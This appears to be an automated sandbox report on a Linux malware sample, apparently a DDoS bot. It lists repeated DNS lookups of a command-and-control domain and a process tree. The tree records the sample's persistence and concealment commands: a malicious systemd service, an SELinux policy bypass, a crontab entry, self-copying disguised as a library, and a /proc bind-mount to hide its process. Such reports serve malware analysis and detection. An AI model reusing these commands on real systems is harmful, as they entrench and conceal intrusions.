Jul 2, 2024 18:13:55.484910965 CEST	8.8.8.8	192.168.2.14	0xafbe	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:57.117747068 CEST	8.8.8.8	192.168.2.14	0x39c3	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:58.741000891 CEST	8.8.8.8	192.168.2.14	0x77d5	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:00.364415884 CEST	8.8.8.8	192.168.2.14	0xda3	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:01.980998039 CEST	8.8.8.8	192.168.2.14	0xeb01	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:03.615884066 CEST	8.8.8.8	192.168.2.14	0xb422	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:05.239275932 CEST	8.8.8.8	192.168.2.14	0x64a4	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:06.865492105 CEST	8.8.8.8	192.168.2.14	0x36bb	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:08.497504950 CEST	8.8.8.8	192.168.2.14	0xc048	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:10.111176968 CEST	8.8.8.8	192.168.2.14	0xfb6b	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:11.740333080 CEST	8.8.8.8	192.168.2.14	0xc1d6	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:13.347879887 CEST	8.8.8.8	192.168.2.14	0x4f76	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:14.956865072 CEST	8.8.8.8	192.168.2.14	0x750a	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:16.597234964 CEST	8.8.8.8	192.168.2.14	0x9d9e	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:18.224234104 CEST	8.8.8.8	192.168.2.14	0xad62	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:19.853800058 CEST	8.8.8.8	192.168.2.14	0x473e	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:21.470643044 CEST	8.8.8.8	192.168.2.14	0x569a	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:23.249955893 CEST	8.8.8.8	192.168.2.14	0x54a5	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:24.867027998 CEST	8.8.8.8	192.168.2.14	0xcc96	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:26.486515045 CEST	8.8.8.8	192.168.2.14	0x8082	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:28.102900028 CEST	8.8.8.8	192.168.2.14	0x43c7	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:29.728904009 CEST	8.8.8.8	192.168.2.14	0x7baf	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:31.372519970 CEST	8.8.8.8	192.168.2.14	0x5a88	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:32.987096071 CEST	8.8.8.8	192.168.2.14	0xc44f	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:35.376889944 CEST	8.8.8.8	192.168.2.14	0x15b	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:36.991436958 CEST	8.8.8.8	192.168.2.14	0x9ab2	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:38.598002911 CEST	8.8.8.8	192.168.2.14	0xf5ac	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:40.228498936 CEST	8.8.8.8	192.168.2.14	0x72fc	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:41.830179930 CEST	8.8.8.8	192.168.2.14	0x46c0	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:43.446855068 CEST	8.8.8.8	192.168.2.14	0x5dc2	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:45.074681997 CEST	8.8.8.8	192.168.2.14	0x5822	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:46.691786051 CEST	8.8.8.8	192.168.2.14	0x224e	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:48.298605919 CEST	8.8.8.8	192.168.2.14	0x1830	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:49.929575920 CEST	8.8.8.8	192.168.2.14	0x4e2a	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:51.542553902 CEST	8.8.8.8	192.168.2.14	0x656d	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:53.179951906 CEST	8.8.8.8	192.168.2.14	0x1f1e	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:54.804291010 CEST	8.8.8.8	192.168.2.14	0xbb78	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:56.444809914 CEST	8.8.8.8	192.168.2.14	0xb3de	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:58.052819014 CEST	8.8.8.8	192.168.2.14	0x8a89	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:59.675591946 CEST	8.8.8.8	192.168.2.14	0x42d4	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:01.322160006 CEST	8.8.8.8	192.168.2.14	0x8637	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:02.926660061 CEST	8.8.8.8	192.168.2.14	0x3008	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:04.533792019 CEST	8.8.8.8	192.168.2.14	0x7414	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:06.343741894 CEST	8.8.8.8	192.168.2.14	0xdcdb	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:07.984412909 CEST	8.8.8.8	192.168.2.14	0xe3d7	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:09.599952936 CEST	8.8.8.8	192.168.2.14	0x65f8	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:11.211251974 CEST	8.8.8.8	192.168.2.14	0x91b4	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:12.836824894 CEST	8.8.8.8	192.168.2.14	0x73b4	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: ausNOyj9by.elf PID: 5482, Parent PID: 5408

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	/tmp/ausNOyj9by.elf
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5486, Parent PID: 5482

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5486, Parent PID: 5482

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	/tmp/ausNOyj9by.elf
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5494, Parent PID: 5486

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: bash PID: 5494, Parent PID: 5486

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5495, Parent PID: 5494

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5495, Parent PID: 5494

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5499, Parent PID: 5494

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5499, Parent PID: 5494

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5503, Parent PID: 5494

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5503, Parent PID: 5494

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5504, Parent PID: 5494

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: journalctl PID: 5504, Parent PID: 5494

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/usr/bin/journalctl
Arguments:	journalctl -xe --no-pager
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5505, Parent PID: 5486

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: bash PID: 5505, Parent PID: 5486

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5506, Parent PID: 5505

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5507, Parent PID: 5505

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5508, Parent PID: 5505

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5511, Parent PID: 5486

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: bash PID: 5511, Parent PID: 5486

General

Start time (UTC):	16:13:10
Start date (UTC):	02/07/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5512, Parent PID: 5486

General

Start time (UTC):	16:13:10
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: update-rc.d PID: 5512, Parent PID: 5486

General

Start time (UTC):	16:13:10
Start date (UTC):	02/07/2024
Path:	/usr/sbin/update-rc.d
Arguments:	update-rc.d dns-udp4 defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 5513, Parent PID: 5512

General

Start time (UTC):	16:13:10
Start date (UTC):	02/07/2024
Path:	/usr/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 5513, Parent PID: 5512

General

Start time (UTC):	16:13:10
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5517, Parent PID: 5486

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: mount PID: 5517, Parent PID: 5486

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/bin/mount
Arguments:	mount -o bind /tmp/ /proc/5486
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5539, Parent PID: 5486

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: service PID: 5539, Parent PID: 5486

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	service cron start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5540, Parent PID: 5539

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5540, Parent PID: 5539

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5541, Parent PID: 5539

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5541, Parent PID: 5539

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5542, Parent PID: 5539

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5542, Parent PID: 5539

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5543, Parent PID: 5539

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5544, Parent PID: 5543

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5544, Parent PID: 5543

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5545, Parent PID: 5543

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5545, Parent PID: 5543

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5539, Parent PID: 5486

General

Start time (UTC):	16:13:13
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start cron.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: ausNOyj9by.elf PID: 5574, Parent PID: 5486

General

Start time (UTC):	16:13:13
Start date (UTC):	02/07/2024
Path:	/tmp/ausNOyj9by.elf
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: systemctl PID: 5574, Parent PID: 5486

General

Start time (UTC):	16:13:13
Start date (UTC):	02/07/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5497, Parent PID: 5496

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5497, Parent PID: 5496

General

Start time (UTC):	16:13:08
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5501, Parent PID: 5500

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5501, Parent PID: 5500

General

Start time (UTC):	16:13:09
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5515, Parent PID: 5514

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5515, Parent PID: 5514

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: udisksd PID: 5528, Parent PID: 803

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 5528, Parent PID: 803

General

Start time (UTC):	16:13:11
Start date (UTC):	02/07/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 5564, Parent PID: 1

General

Start time (UTC):	16:13:13
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5564, Parent PID: 1

General

Start time (UTC):	16:13:13
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5609, Parent PID: 5564

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5617, Parent PID: 5609

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5617, Parent PID: 5609

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5618, Parent PID: 5617

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5618, Parent PID: 5617

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5619, Parent PID: 5618

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5619, Parent PID: 5618

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5623, Parent PID: 5619

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5623, Parent PID: 5619

General

Start time (UTC):	16:14:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: systemd PID: 5641, Parent PID: 1

General

Start time (UTC):	16:14:02
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5641, Parent PID: 1

General

Start time (UTC):	16:14:02
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5670, Parent PID: 5641

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5678, Parent PID: 5670

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5678, Parent PID: 5670

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5679, Parent PID: 5678

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5679, Parent PID: 5678

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5680, Parent PID: 5679

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5680, Parent PID: 5679

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5684, Parent PID: 5680

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5684, Parent PID: 5680

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	5181592 bytes
MD5 hash:	ac46e9818cd936fbfcba5effd7f4e850

Chronological Activities

Analysis Process: systemd PID: 5704, Parent PID: 1

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5704, Parent PID: 1

General

Start time (UTC):	16:15:01
Start date (UTC):	02/07/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
